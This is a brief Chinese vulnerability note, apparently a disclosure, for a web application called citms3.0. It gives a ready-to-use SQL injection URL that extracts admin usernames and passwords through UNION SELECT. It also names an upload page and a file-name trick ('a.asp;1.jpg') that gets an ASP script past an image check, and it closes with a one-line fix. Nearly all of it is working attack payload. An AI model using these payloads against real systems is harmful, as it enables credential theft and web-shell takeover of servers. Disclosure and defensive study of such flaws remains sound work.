注入:
/citms3.0/list.asp?id=1320 union select 1,name,3,pass,5,6,7,8,9,10,11,12,13,14,15,16 from admin

上传
/soft/demo/citms3.0/upload_pic.asp

上传a.asp;1.jpg 成功后得到:a.asp;随机数.jpg

如: /a.asp;131672.jpg

修复:

加入过滤和上传验证